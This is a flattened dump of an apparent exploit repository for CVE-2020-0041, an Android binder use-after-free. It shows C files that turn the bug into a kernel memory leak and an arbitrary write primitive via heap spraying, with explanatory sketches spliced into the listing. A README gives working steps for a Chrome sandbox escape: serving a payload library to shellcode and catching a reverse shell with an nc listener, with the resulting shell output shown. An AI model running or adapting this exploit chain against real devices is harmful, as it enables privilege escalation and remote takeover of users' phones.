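#define EPITEM_FLLINK_OFF   0x58  /* offsetof(struct epitem, fllink)    */
#define FILE_F_EP_LINKS_OFF 0xd8  /* offsetof(struct file, f_ep_links)  */

static uint64_t epitem_from_fllink(uint64_t fllink_ptr)
{
    return fllink_ptr - EPITEM_FLLINK_OFF;
}

static uint64_t file_from_f_ep_links(uint64_t links_ptr)
{
    return links_ptr - FILE_F_EP_LINKS_OFF;
}
```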
*/ 422 | if (A == origA) { 423 | res = true; 424 | 425 | if (discard_realloc_thread(B)) 426 | node->tid = B; 427 | } 428 | 429 | reset_realloc_threads(); 430 | 431 | return res; 432 | } 433 | 434 | 435 | /* 436 | * Trigger a write8 and overwrite and arbitrary location with a controlled value. 437 | * As above, we need to go through the cycle of replacing a `binder_node` with an epitem 438 | * and then with controlled content from the `sendmsg()` threads. 439 | */ 440 | bool node_write8(struct exp_node *node, uint64_t what, uint64_t where) 441 | { 442 | struct exp_node *dummy = NULL; 443 | int pfd[2]; 444 | uint8_t data[0x80]; 445 | 446 | if (!node) 447 | return false; 448 | 449 | if (node->idx == node->num_pending) 450 | return false; 451 | 452 | memset(data, 0, 0x80); 453 | 454 | *(uint64_t *)(data + 0x20) = what; 455 | *(uint64_t *)(data + 0x28) = where; 456 | *(uint64_t *)(data + 0x30) = 0; 457 | *(uint64_t *)(data + 0x38) = 0; /* proc == NULL */ 458 | *(uint64_t *)(data + 0x40) = 0; /* No refs. */ 459 | *(uint32_t *)(data + 0x48) = 0; /* Internal strong refs. */ 460 | *(uint32_t *)(data + 0x4c) = 0; /* local_weak_refs == 0. */ 461 | *(uint32_t *)(data + 0x50) = 1; /* local strong refs. */ 462 | *(uint32_t *)(data + 0x54) = 0; /* tmp_refs == 0. */ 463 | *(uint64_t *)(data + 0x58) = 0x4444444444444444; /* Used by node_realloc_content to verify replacement */ 464 | *(uint64_t *)(data + 0x68) = 0; /* has_strong_refs == 0 && has_weak_refs == 0 */ 465 | 466 | /* Create dummy node. */ 467 | dummy = node_new("dummy"); 468 | pipe(pfd); 469 | 470 | /* Overlay an epitem. */ 471 | while (!node_realloc_epitem(dummy, pfd[0])) 472 | node_reset(dummy); 473 | 474 | 475 | /* Do we know the node kaddr yet? */ 476 | if (!node->kaddr) { 477 | /* Drop the current epitem. */ 478 | node_free_epitem(node); 479 | 480 | 481 | /* Use the previous'dummy' node to disclose both 482 | * dummy and node kaddr. 483 | */ 484 | node_kaddr_disclose(dummy, node); 485 | } 486 | 487 | /* update the kaddr values to bypass safe unlinking. */ 488 | *(uint64_t *)(data + 0x8) = node->kaddr + 0x8; 489 | *(uint64_t *)(data + 0x10) = node->kaddr + 0x8; 490 | 491 | log_info("[*] Reallocating content of '%s' with controlled data.", node->name); 492 | while (!node_realloc_content(node, data, 0x80)) { 493 | log_info("."); 494 | node_reset(node); 495 | while (!node_kaddr_disclose(dummy, node)) { 496 | node_reset(node); 497 | } 498 | 499 | /* Update values. */ 500 | *(uint64_t *)(data + 0x8) = node->kaddr + 0x8; 501 | *(uint64_t *)(data + 0x10) = node->kaddr + 0x8; 502 | } 503 | 504 | if (dummy) { 505 | node_free(dummy); 506 | close(pfd[0]); 507 | close(pfd[1]); 508 | } 509 | log_info("[DONE]\n"); 510 | 511 | /* Perform the actual write8, all the code before was for setup... */ 512 | log_info("[+] Overwriting 0x%llx with 0x%llx...", where, what); 513 | pending_node_write8(node->th[node->idx - 1]); 514 | log_info("[DONE]\n"); 515 | 516 | return true; 517 | } 518 | 519 | 520 | /* 521 | * Trigger a write8 primitive and overwrite an arbitrary location with a NULL value. 522 | * Assumes the binder node associated with `node` has just been freed, and its kernel 523 | * address has been previously disclosed. 
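It is worth spelling out what the write8 primitive actually is. When the pending-node thread later frees its buffer, `binder_dec_node()` unlinks the fake node's list entry, whose two pointers the code above planted at `data + 0x20`/`data + 0x28`; the `data + 0x8`/`data + 0x10` self-pointers exist only to survive the other unlink on the same path (the "bypass safe unlinking" comment). The net memory effect, sketched:

```
/* Net effect of the unlink-based write8 (sketch): with the fake list
 * entry set to { next = what, prev = where }, the kernel's
 *     prev->next = next;  next->prev = prev;
 * turns into exactly two stores: */
*(uint64_t *)where = what;        /* the write we asked for            */
*(uint64_t *)(what + 8) = where;  /* mirrored side effect, which is    */
                                  /* why exploit.c zeroes map + 8      */
                                  /* right after the sysctl injection  */
```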
524 | */ 525 | bool node_write_null(struct exp_node *node, uint64_t where) 526 | { 527 | return node_write8(node, 0, where); 528 | } 529 | 530 | 531 | bool node_leak(struct exp_node *node, uint64_t *A, uint64_t *B) 532 | { 533 | if (!node || node->idx == node->num_pending) 534 | return false; 535 | 536 | pending_node_leak(node->th[node->idx++], A, B); 537 | 538 | return true; 539 | } 540 | 541 | -------------------------------------------------------------------------------- /lpe/src/pending_node.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include "log.h" 9 | #include "binder.h" 10 | #include "endpoint.h" 11 | #include "pending_node.h" 12 | 13 | static struct pending_node *pending_nodes = NULL; 14 | static uint64_t last_node_th = 0; 15 | 16 | static struct pending_node *pending_node_new(void) 17 | { 18 | struct pending_node *node = NULL; 19 | 20 | node = malloc(sizeof(*node)); 21 | if (!node) { 22 | log_err("malloc: %s\n", strerror(errno)); 23 | return NULL; 24 | } 25 | 26 | memset(node, 0, sizeof(*node)); 27 | 28 | if (pthread_barrier_init(&node->barrier, NULL, 2)) { 29 | log_err("pthread_barrier_init: %s\n", strerror(errno)); 30 | free(node); 31 | return NULL; 32 | } 33 | 34 | if (pthread_barrier_init(&node->ready, NULL, 2)) { 35 | log_err("pthread_barrier_init: %s\n", strerror(errno)); 36 | free(node); 37 | return NULL; 38 | } 39 | 40 | if (pthread_barrier_init(&node->do_barrier, NULL, 2)) { 41 | log_err("pthread_barrier_init: %s\n", strerror(errno)); 42 | free(node); 43 | return NULL; 44 | } 45 | 46 | if (pthread_barrier_init(&node->done_barrier, NULL, 2)) { 47 | log_err("pthread_barrier_init: %s\n", strerror(errno)); 48 | free(node); 49 | return NULL; 50 | } 51 | 52 | 53 | /* Insert in front. */ 54 | node->next = pending_nodes; 55 | pending_nodes = node; 56 | 57 | return node; 58 | } 59 | 60 | static struct pending_node *pending_node_get(pthread_t node_th) 61 | { 62 | struct pending_node *tmp = pending_nodes; 63 | 64 | while (tmp) { 65 | if (tmp->uaf_node_th == node_th) 66 | return tmp; 67 | tmp = tmp->next; 68 | } 69 | 70 | return NULL; 71 | } 72 | 73 | /* 74 | * This thread keep a reference to the freed binder_node, which allows leaking a qword at offset 0x58 75 | * and 0x60 of an object in the kmalloc-128 slab, as well a trigerring a controlled write8 76 | */ 77 | void *pending_node_thread(void *args) 78 | { 79 | struct pending_node *node = (struct pending_node *)args; 80 | uint32_t remaining = 0, consumed = 0; 81 | uint32_t looper = BC_ENTER_LOOPER; 82 | struct binder_io msg, reply; 83 | struct binder_state *from = node->bs; 84 | uint64_t handle = node->uaf_node; 85 | uint8_t msg_data[0x1000], reply_data[0x1000]; 86 | uint64_t res = -1; 87 | int signo; 88 | sigset_t set; 89 | uint64_t retval = 0; 90 | 91 | /* Enter looper. */ 92 | binder_write(from, &looper, sizeof(looper)); 93 | 94 | struct binder_transaction_data *t = (struct binder_transaction_data *)(msg_data + sizeof(uint32_t)); 95 | make_transaction(msg_data, false, handle, reply_data, 0x10, NULL, 0); 96 | /* Fix transaction code. */ 97 | t->code = ADD_PENDING_NODE; 98 | /* Make the call. */ 99 | binder_write(from, msg_data, sizeof(*t) + sizeof(uint32_t)); 100 | 101 | /* Poll for the answer. */ 102 | /* Wait for BR_TRANSACTION_COMPLETE. */ 103 | struct pollfd pfd; 104 | pfd.fd = from->fd; 105 | pfd.events = POLLIN; 106 | /* Wait up to a sec. 
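For context on the leak this thread performs below: when the stale transaction is finally delivered, the driver copies two fields of the target `binder_node` straight into the userspace `binder_transaction_data`. Once the node has been freed and reallocated, those two loads read whatever object now occupies the slot. Paraphrased (kernel side, not verbatim):

```
/* Kernel side of the leak, paraphrased from the binder driver:
 *     tr.target.ptr = target_node->ptr;     // binder_node + 0x58
 *     tr.cookie     = target_node->cookie;  // binder_node + 0x60
 * so t->target.ptr / t->cookie read back below carry the qwords at
 * +0x58 / +0x60 of whatever object replaced the freed node. */
```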
*/ 107 | if (!poll(&pfd, 1, 1000)) { 108 | fprintf(stderr, "[-] Something went wrong will inserting the pending node.\n"); 109 | pthread_exit(&res); 110 | } 111 | 112 | pthread_barrier_wait(&node->ready); 113 | 114 | pthread_barrier_wait(&node->ready); 115 | 116 | /* We wait here, until ask by the exploit to leak values from the transaction. */ 117 | pthread_barrier_wait(&node->do_barrier); //Do leak 118 | 119 | /* Reading back transaction. */ 120 | consumed = remaining = 0; 121 | uint32_t cmd; 122 | do { 123 | cmd = binder_read_next(from, reply_data, &remaining, &consumed); 124 | } while (cmd != BR_TRANSACTION && cmd != BR_REPLY); 125 | 126 | /* Getting a BR_REPLY, would mean that we successfully cleaned up the transaction. */ 127 | if (cmd == BR_REPLY) { 128 | goto end; 129 | } 130 | 131 | t = (struct binder_transaction_data *)(reply_data + consumed - sizeof(*t)); 132 | /* data at offset 0x58. */ 133 | node->uaf_buffer = t->data.ptr.buffer; 134 | 135 | node->leaked_data[0] = t->target.ptr; /* data at offset 0x58. */ 136 | node->leaked_data[1] = t->cookie; /* data at offset 0x60. */ 137 | 138 | /* Check the node state. */ 139 | if (node->state == NODE_FINISHED) 140 | goto end; 141 | 142 | node->state = NODE_LEAKED; 143 | 144 | pthread_barrier_wait(&node->done_barrier); 145 | pthread_barrier_wait(&node->ready); 146 | 147 | /* This for sync. */ 148 | 149 | pthread_barrier_wait(&node->do_barrier); 150 | 151 | /* Check the node state. */ 152 | if (node->state == NODE_FINISHED) 153 | goto end; 154 | 155 | 156 | /* If we decide to go ahead with the buffer freeing, wait on the barrier, 157 | * otherwise just exit the thread. 158 | */ 159 | binder_free_buffer(from, node->uaf_buffer); 160 | node->state = NODE_FREE; 161 | end: 162 | pthread_barrier_wait(&node->done_barrier); 163 | ioctl(node->bs->fd, BINDER_THREAD_EXIT, 0); 164 | pthread_exit(&retval); 165 | } 166 | 167 | 168 | 169 | static void pending_node_create_thread(void *args) 170 | { 171 | struct binder_state *bs = (struct binder_state *)*(uint64_t *)args; 172 | uint64_t node = *(uint64_t *)(args + 8); 173 | 174 | /* Create a ONE_WAY transaction to ask the endpoint to create a pending_node 175 | * back to us. 176 | */ 177 | struct binder_transaction_data *t; 178 | uint8_t rdata[128]; 179 | uint8_t txn_data[128]; 180 | 181 | uint32_t remaining = 0, consumed = 0; 182 | struct binder_io msg, reply; 183 | 184 | /* Register this thread as a looper. */ 185 | uint32_t looper = BC_ENTER_LOOPER; 186 | binder_write(bs, &looper, sizeof(looper)); 187 | 188 | 189 | /* Send the ONE_WAY transaction. */ 190 | t = (struct binder_transaction_data *)(txn_data + sizeof(uint32_t)); 191 | make_transaction(txn_data, true, node, rdata, 0x8, NULL, 0); 192 | /* Fix transaction code. */ 193 | t->code = ADD_PENDING_NODE; 194 | // printf("[*] About to make node\n"); 195 | // getchar(); 196 | /* Make the binder call. */ 197 | binder_write(bs, txn_data, sizeof(*t) + sizeof(uint32_t)); 198 | 199 | /* Wait for the transaction from the endpoint. */ 200 | while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_TRANSACTION); 201 | 202 | 203 | // printf("[*] Node should be made\n"); 204 | // getchar(); 205 | 206 | /* Get transaction. */ 207 | t = (struct binder_transaction_data *)(rdata + consumed - sizeof(*t)); 208 | 209 | if (t->code != ADD_PENDING_NODE) { 210 | fprintf(stderr, "[-] Invalid transaction code %x. Expected %x\n", t->code, ADD_PENDING_NODE); 211 | exit(1); 212 | } 213 | 214 | /* Free the buffer. 
*/ 215 | binder_free_buffer(bs, t->data.ptr.buffer); 216 | 217 | /* Okay, so instead of a reply, we send a new transaction here, in order to have the thing go into the pending node list. */ 218 | t = (struct binder_transaction_data *)(txn_data + sizeof(uint32_t)); 219 | make_transaction(txn_data, false, node, rdata, 0x10, NULL, 0); 220 | /* Fix transaction code. */ 221 | t->code = ADD_PENDING_NODE; 222 | /* Make the call. */ 223 | binder_write(bs, txn_data, sizeof(*t) + sizeof(uint32_t)); 224 | 225 | int res = 0; 226 | pthread_exit(&res); 227 | } 228 | 229 | /* 230 | * The endpoint calls into this function to setup a pending node. 231 | */ 232 | pthread_t add_pending_node(struct binder_state *from, uint64_t pending_node) 233 | { 234 | pthread_t th; 235 | 236 | struct pending_node *node = NULL; 237 | 238 | /* Create new pending_node */ 239 | node = pending_node_new(); 240 | if (!node) 241 | return NULL; 242 | 243 | node->bs = from; 244 | node->uaf_node = pending_node; 245 | 246 | if (pthread_create(&th, NULL, pending_node_thread, (void *)node)) { 247 | perror("pthread"); 248 | return (pthread_t)-1; 249 | } 250 | 251 | node->uaf_node_th = th; 252 | last_node_th = th; 253 | 254 | pthread_barrier_wait(&node->ready); 255 | 256 | return th; 257 | } 258 | 259 | 260 | /* 261 | * The endpoint calls into this function to 262 | * remove a specific pending node. 263 | */ 264 | void terminate_pending_node(pthread_t th) 265 | { 266 | /* Just unlock the barrier, and pthread_join */ 267 | struct pending_node *node = pending_node_get(th); 268 | if (!node) 269 | return ; 270 | 271 | 272 | pthread_barrier_wait(&node->ready); 273 | node->state = NODE_FINISHED; 274 | node->uaf_buffer = 0; 275 | pthread_barrier_wait(&node->do_barrier); 276 | pthread_barrier_wait(&node->done_barrier); 277 | pthread_join(node->uaf_node_th, NULL); 278 | 279 | /* Remove node. */ 280 | 281 | struct pending_node *tmp = pending_nodes; 282 | if (tmp == node) { 283 | pending_nodes = node->next; 284 | 285 | } else { 286 | while (tmp->next != node) 287 | tmp = tmp->next; 288 | 289 | tmp->next = node->next; 290 | } 291 | free(node); 292 | } 293 | 294 | 295 | /* 296 | * Perform a ADD_PENDING_NODE binder query, in order to ask the remote 297 | * endpoint to create a pending node transaction. 298 | */ 299 | pthread_t pending_node_create(struct binder_state *bs, uint64_t node) 300 | { 301 | uint64_t args[] = {bs, node}; 302 | pthread_t th; 303 | 304 | if (pthread_create(&th, NULL, pending_node_create_thread, (void *)args)) { 305 | perror("pthread create\n"); 306 | exit(0); 307 | } 308 | 309 | pthread_join(th, NULL); 310 | 311 | return last_node_th; 312 | } 313 | 314 | void pending_node_free(struct binder_state *bs, uint64_t node, uint64_t vma_start, uint32_t strong, uint32_t weak, bool second) 315 | { 316 | /* So we have our pending node in another thread. 
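Before the teardown helpers, a quick map of the barrier handshake used throughout this file: each control-side operation is one ready -> do_barrier -> done_barrier round trip with `pending_node_thread()` (the very first `ready` is consumed by `add_pending_node()` when the thread parks):

```
/* Barrier choreography between a controller and pending_node_thread():
 *   ready        - thread is parked with its stale transaction queued
 *   do_barrier   - thread proceeds: re-reads the transaction (leak) or
 *                  frees the UAF buffer (write8 / teardown)
 *   done_barrier - results are published; controller may join
 * pending_node_leak(), pending_node_write8() and
 * terminate_pending_node() all drive this same sequence. */
```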
Now release our reference to uaf_node 317 | * and trigger the bug (3 times needs) to free the uaf_node, while the pending node thread keeps 318 | * a reference to it (as target_node) 319 | */ 320 | int i; 321 | for (i = 0; i < strong; i++) 322 | dec_node(bs, node, vma_start, true, second); 323 | 324 | for (i = 0; i < weak; i++) 325 | dec_node(bs, node, vma_start, false, second); 326 | } 327 | 328 | /* 329 | * Trigger a write8, by having the pending node thread 330 | * calling BC_FREE_BUFFER, which will enter the 331 | * `binder_dec_node()` function with (hopefully) controlled 332 | * `binder_node`, ultimately leading to a controlled 333 | * write8 334 | */ 335 | void pending_node_write8(pthread_t th) 336 | { 337 | struct pending_node *node = pending_node_get(th); 338 | if (!node) 339 | return ; 340 | /* Buffer release. */ 341 | 342 | pthread_barrier_wait(&node->ready); 343 | pthread_barrier_wait(&node->do_barrier); 344 | pthread_barrier_wait(&node->done_barrier); 345 | pthread_join(th, NULL); 346 | 347 | struct pending_node *tmp = pending_nodes; 348 | if (tmp == node) { 349 | pending_nodes = node->next; 350 | 351 | } else { 352 | while (tmp->next != node) 353 | tmp = tmp->next; 354 | 355 | tmp->next = node->next; 356 | } 357 | 358 | free(node); 359 | } 360 | 361 | /* 362 | * Kindly ask the endpoint to terminate a specific pending node thread. 363 | */ 364 | void pending_node_terminate(struct binder_state *bs, uint64_t handle, pthread_t th) 365 | { 366 | uint8_t txn_data[0x100]; 367 | uint8_t reply_data[0x100]; 368 | struct binder_io msg, reply; 369 | 370 | 371 | bio_init(&msg, txn_data, sizeof(txn_data), 10); 372 | bio_init(&reply, reply_data, sizeof(reply_data), 10); 373 | 374 | bio_put_uint32(&msg, (uint32_t)th); 375 | bio_put_uint32(&msg, (uint32_t)((uint64_t)(th)>>32)); 376 | binder_call(bs, &msg, &reply, handle, TERMINATE_PENDING_NODE); 377 | 378 | binder_free_buffer(bs, reply.data0); 379 | } 380 | 381 | /* 382 | * Leak the 2 qword of data from the UAFed pending node. 383 | * It has the side effect or terminating the pending_node_thread 384 | */ 385 | void pending_node_leak(pthread_t th, uint64_t *q1, uint64_t *q2) 386 | { 387 | struct pending_node *node = pending_node_get(th); 388 | if (!node) 389 | return; 390 | /* Okay spray epoll structures. */ 391 | pthread_barrier_wait(&node->ready); 392 | pthread_barrier_wait(&node->do_barrier); 393 | pthread_barrier_wait(&node->done_barrier); 394 | /* Inspecting node value. */ 395 | 396 | if (q1) 397 | *q1 = node->leaked_data[0]; 398 | if (q2) 399 | *q2 = node->leaked_data[1]; 400 | } 401 | -------------------------------------------------------------------------------- /lpe/src/realloc.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | #include "realloc.h" 16 | #include "log.h" 17 | #include "helpers.h" 18 | 19 | struct realloc_thread { 20 | void *stack; 21 | pid_t pid; 22 | pthread_t th; 23 | bool evicted; 24 | size_t size; 25 | int cpu; 26 | int pair[2]; 27 | int ctrl[2]; 28 | pthread_barrier_t barrier; 29 | }; 30 | 31 | uint8_t realloc_buffer[BUFSZ]; 32 | 33 | volatile struct realloc_thread threads[NREALLOC]; 34 | 35 | 36 | pthread_barrier_t realloc_barrier; 37 | 38 | /* 39 | * This thread is in charge of reallocating the freed binder_node 40 | * with controlled data. 
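The reallocation vehicle is the classic blocking-`sendmsg()` ancillary-data spray. Reduced to its core (a self-contained sketch of the technique, not a drop-in replacement for the thread below; note that the payload's first bytes must form a plausible `struct cmsghdr`, which is why `spawn_realloc_threads()` writes BUFSZ into the first dword of `realloc_buffer`):

```
#include <string.h>
#include <sys/socket.h>

/* Core of the sendmsg() spray (sketch): once the peer's queue is full,
 * a blocking sendmsg() parks with its control data sitting in a
 * kmalloc'ed buffer, pinning our bytes in (here) kmalloc-128. */
static void spray_once(const void *payload, size_t size)
{
    int pair[2];
    struct msghdr msg;
    struct iovec iov;

    socketpair(AF_LOCAL, SOCK_DGRAM, 0, pair);

    memset(&msg, 0, sizeof(msg));
    iov.iov_base = (void *)payload;
    iov.iov_len = size;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    /* Fill the datagram queue so the next send blocks. */
    while (sendmsg(pair[0], &msg, MSG_DONTWAIT) > 0)
        ;

    /* Ancillary data is copied into kmalloc(size) before blocking. */
    msg.msg_control = (void *)payload;
    msg.msg_controllen = size;
    sendmsg(pair[0], &msg, 0); /* blocks; allocation stays live */
}
```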
41 | */ 42 | void *realloc_thread(void *args) 43 | { 44 | 45 | uint8_t buffer[BUFSZ + 1]; 46 | struct realloc_thread *thread = (struct realloc_thread *)args; 47 | size_t size = thread->size; 48 | int cpu = thread->cpu; 49 | struct msghdr msg; 50 | struct iovec iov; 51 | memset(&iov, 0, sizeof(iov)); 52 | memset(&msg, 0, sizeof(msg)); 53 | 54 | pin_cpu(cpu); 55 | 56 | uint32_t pid = syscall(__NR_gettid); 57 | /* Exhaust the available socket window. */ 58 | iov.iov_base = realloc_buffer; 59 | iov.iov_len = size; 60 | msg.msg_iov = &iov; 61 | msg.msg_iovlen = 1; 62 | 63 | while (sendmsg(thread->pair[0], &msg, MSG_DONTWAIT) > 0); 64 | 65 | /* The next call will block. */ 66 | msg.msg_control = realloc_buffer; 67 | msg.msg_controllen = size; 68 | 69 | /* Signal we have finished spawning. */ 70 | 71 | thread->evicted = false; 72 | while (!thread->evicted) { 73 | 74 | //pthread_barrier_wait(&realloc_barrier); 75 | /* We're waiting here for the signal to copy the buffer data. */ 76 | pthread_barrier_wait(&thread->barrier); 77 | 78 | 79 | memcpy(buffer, realloc_buffer, size); 80 | *(uint64_t *)(buffer + 0x60) = pid; 81 | msg.msg_control = buffer; 82 | msg.msg_controllen = size; 83 | 84 | //pthread_barrier_wait(&realloc_barrier); 85 | /* We're waiting for the signal to block on the sendmsg syscall, and kmalloc() our 86 | * controlled data. 87 | */ 88 | pthread_barrier_wait(&thread->barrier); 89 | syscall(__NR_sendmsg, thread->pair[0], &msg, 0); 90 | 91 | 92 | pthread_barrier_wait(&thread->barrier); 93 | 94 | /* And fill the socket queue once again. */ 95 | while (sendmsg(thread->pair[0], &msg, MSG_DONTWAIT) > 0); 96 | } 97 | 98 | /* Wait for the exit signal. */ 99 | 100 | pthread_barrier_wait(&thread->barrier); 101 | 102 | return NULL; 103 | } 104 | 105 | /* 106 | * Wait on the barrier, which will ultimately make the threads enter the 107 | * `sendmsg()` syscall and allocate controlled data. 108 | */ 109 | void realloc_barrier_wait(void) 110 | { 111 | int i; 112 | 113 | for (i = 0; i < NREALLOC; i++) { 114 | if (threads[i].evicted) 115 | continue; 116 | pthread_barrier_wait(&threads[i].barrier); 117 | } 118 | } 119 | 120 | /* 121 | * Spawn all the threads used during the reallocation. 122 | */ 123 | void spawn_realloc_threads() 124 | { 125 | memset(realloc_buffer, 'A', BUFSZ); 126 | *(uint32_t *)realloc_buffer = BUFSZ; 127 | *(uint32_t *)(realloc_buffer + 4) = 0; // set node->lock 128 | 129 | if (pthread_barrier_init(&realloc_barrier, NULL, NREALLOC + 1) < 0) { 130 | perror("pthread_barrier_init"); 131 | exit(1); 132 | } 133 | 134 | int i; 135 | int ncpus = sysconf(_SC_NPROCESSORS_ONLN); 136 | for (i = 0; i < NREALLOC; i++) { 137 | pid_t pid; 138 | void *stack = malloc(0x10000); 139 | threads[i].evicted = false; 140 | threads[i].size = BUFSZ; 141 | threads[i].cpu = i % ncpus; 142 | threads[i].stack = stack; 143 | 144 | if (pthread_barrier_init(&threads[i].barrier, NULL, 2) < 0) { 145 | log_err("[-] pthread_barrier_init: '%s'\n", strerror(errno)); 146 | exit(1); 147 | } 148 | 149 | /* Create a socketpair. */ 150 | if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, threads[i].pair) < 0) { 151 | perror("socketpair"); 152 | pthread_exit(NULL); 153 | } 154 | 155 | pid = clone(realloc_thread, stack + 0x10000 - 8, CLONE_VM|CLONE_FILES|SIGCHLD, &threads[i]); 156 | if (pid < 0) { 157 | perror("clone"); 158 | exit(1); 159 | } 160 | 161 | threads[i].pid = pid; 162 | 163 | } 164 | } 165 | 166 | /* 167 | * Setup the content of the buffer, whose content will be sprayed in kernel during the 168 | * `sendmsg()` call. 
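One subtlety from `realloc_thread()` above pays off later: each sprayer is created with raw `clone(CLONE_VM|CLONE_FILES)` rather than `pthread_create()`, so it has its own PID, and it stamps that PID at offset 0x60 of the sprayed buffer. That is exactly the second qword `node_leak()` returns, which lets the caller identify the winning sprayer. Condensed from `node_realloc_content()` in node.c (`node` and `origA` come from that context):

```
/* Identifying which sprayer won the reallocation race (condensed from
 * node_realloc_content(); origA is the marker planted at +0x58). */
uint64_t A, B;
node_leak(node, &A, &B);           /* A: +0x58 marker, B: +0x60 tid */
if (A == origA && discard_realloc_thread((pid_t)B))
    node->tid = B;                 /* leave that sprayer blocked    */
```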
169 | */ 170 | void setup_realloc_buffer(void *content, size_t size) 171 | { 172 | if (size <= 8) 173 | return; 174 | 175 | if (size > BUFSZ) 176 | size = BUFSZ; 177 | 178 | /* We need to skip the first 8 bytes, because otherwise, sendmsg will fail. */ 179 | memcpy(realloc_buffer + 8, content + 8, size - 8); 180 | /* Unlock the realloc thread, let them copy the buffer. */ 181 | realloc_barrier_wait(); 182 | } 183 | 184 | /* 185 | * Discard a thread from the pool. We do this when we successfully replaced a `binder_node` with controlled 186 | * content, and this `binder_node` is subsequently used to trigger a write8, as the side effect of this is 187 | * to free (once again) the `binder_node`. As the realoc thread will keep a reference to the `binder_node` and 188 | * free it as well, we keep it blocking on `sendmsg()` for now, until we can clean that reference from the kernel 189 | * stack later on. 190 | */ 191 | bool discard_realloc_thread(pid_t pid) 192 | { 193 | int i; 194 | 195 | for (i = 0; i < NREALLOC; i++) { 196 | if (threads[i].pid == pid) { 197 | threads[i].evicted = true; 198 | return true; 199 | } 200 | } 201 | 202 | return false; 203 | } 204 | 205 | /* 206 | * Make the threads exit their blocking `sendmsg()` call, and brace themselves before 207 | * being use once again to allocate controlled data in kernel land. 208 | */ 209 | void reset_realloc_threads() 210 | { 211 | int i; 212 | uint8_t buf[0x1000]; 213 | 214 | for (i = 0; i < NREALLOC; i++) { 215 | if (threads[i].evicted) 216 | continue; 217 | while (recv(threads[i].pair[1], buf, 0x1000, MSG_DONTWAIT) > 0); 218 | pthread_barrier_wait(&threads[i].barrier); 219 | } 220 | } 221 | 222 | /* 223 | * We're done, kill the whole thread pool. 224 | */ 225 | void cleanup_realloc_threads() 226 | { 227 | int i; 228 | /* Kill realloc threads. */ 229 | for (i = 0; i < NREALLOC; i++) { 230 | int status; 231 | if (threads[i].evicted){ 232 | continue; 233 | } 234 | kill(threads[i].pid, SIGKILL); 235 | close(threads[i].pair[0]); 236 | close(threads[i].pair[1]); 237 | 238 | //pthread_barrier_wait(&threads[i].barrier); 239 | } 240 | int status; 241 | for (i = 0; i < NREALLOC; i++) { 242 | if (threads[i].evicted) 243 | continue; 244 | waitpid(threads[i].pid, &status, 0); 245 | //pthread_join(threads[i].th, NULL); 246 | threads[i].pid = 0; 247 | free(threads[i].stack); 248 | threads[i].stack = 0; 249 | } 250 | } 251 | 252 | 253 | 254 | -------------------------------------------------------------------------------- /sandbox/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-0041: Chrome sandbox escape exploit 2 | 3 | This folder contains the Chrome sandbox escape exploit we wrote for CVE-2020-0041. 4 | The exploit is provided as a set of patches for Chromium 78.0.3904.62 in order to 5 | demonstrate the approach. 6 | 7 | The same code could be simply injected into the renderer from an RCE vulnerability 8 | or using a rooted phone for test pruposes. 9 | 10 | ## Testing the exploit 11 | 12 | 13 | ### Building chrome 14 | 15 | The exploit is provided as a set of patches for a checkout of the `78.0.3904.62` 16 | release branch. 17 | 18 | To test the exploit, first checkout and build the provided branch for Android. 
19 | The exploit was built against a build using the following arguments: 20 | 21 | ``` 22 | target_os = "android" 23 | target_cpu = "arm" 24 | is_debug = false 25 | is_official_build=true 26 | ``` 27 | 28 | After the initial build succeeds, apply the changes in `sandbox/v8.diff` to the 29 | `v8` code, and the changes in `main.diff` to the main repository: 30 | 31 | ``` 32 | user@laptop:~/work/chromium_release/chromium/src$ patch -p1 < ~/num_valid/sandbox/main.diff 33 | patching file content/renderer/binder.c 34 | patching file content/renderer/binder.h 35 | patching file content/renderer/binder_lookup.h 36 | patching file content/renderer/constants.h 37 | patching file content/renderer/exploit.c 38 | patching file content/renderer/render_thread_impl.cc 39 | patching file content/renderer/rop.h 40 | patching file content/renderer/sc.h 41 | patching file content/renderer/uapi_binder.h 42 | 43 | user@laptop:~/chromium/src$ cd v8 44 | user@laptop:~/chromium/src/v8$ patch -p1 < ~/num_valid/sandbox/v8.diff 45 | patching file src/builtins/builtins-typed-array.cc 46 | ``` 47 | 48 | The patches create a hook in the `indexOf` function of typed array buffers, 49 | which when called with 3 or more arguments redirect execution into the `exploit` 50 | function in `content/renderer/exploit.c`. 51 | 52 | After the patches have been applied, rebuild Chromium and install the produced 53 | APK. 54 | 55 | ``` 56 | user@laptop:~/work/chromium_release/chromium/src$ ninja -C out/Default chrome_public_apk -j 8 && \ 57 | out/Default/bin/chrome_public_apk uninstall && out/Default/bin/chrome_public_apk install 58 | ``` 59 | 60 | ### Testing the exploit 61 | 62 | After building the patched chromium and installing it on a phone, the following 63 | setup is required: 64 | 65 | 1. Build the library you would like to payload and run the `serve.py` script from the `sandbox/` folder. 66 | This script will provide the `payload.so` file to be loaded by the shellcode. Additionally, 67 | it also serves the `payload.dex` and `payload.exe` file if the `payload.so` file requests 68 | them (used for the LPE exploit): 69 | 70 | ``` 71 | $ cd reverse_shell && make && cp libs/armeabi-v7a/libpayload.so ../payload.so && cd .. 72 | $ adb reverse tcp:6666 tcp:6666 ; python ./serve.py 73 | ``` 74 | 75 | 2. Setup a reverse shell listener on tcp:5555: 76 | 77 | ``` 78 | $ adb reverse tcp:5555 tcp:5555 ; nc -l -p 5555 -vv 79 | ``` 80 | 81 | 3. Serve `sandbox/index.html` to the browser to trigger the exploit. For example, 82 | using python: 83 | 84 | ``` 85 | $ adb reverse tcp:8080 tcp:8080 ; python -m SimpleHTTPServer 8080 86 | ``` 87 | 88 | Now simply navigate to http://localhost:8080/ to trigger the exploit. 89 | 90 | ``` 91 | $ adb reverse tcp:5555 tcp:5555 ; nc -l -p 5555 -vv 92 | 5555 93 | Listening on [0.0.0.0] (family 0, port 5555) 94 | Connection from localhost 36871 received! 95 | id 96 | uid=10246(u0_a246) gid=10246(u0_a246) groups=10246(u0_a246),3001(net_bt_admin),3002(net_bt),3003(inet),9997(everybody),20246(u0_a246_cache),50246(all_a246) context=u:r:untrusted_app_27:s0:c246,c256,c512,c768 97 | 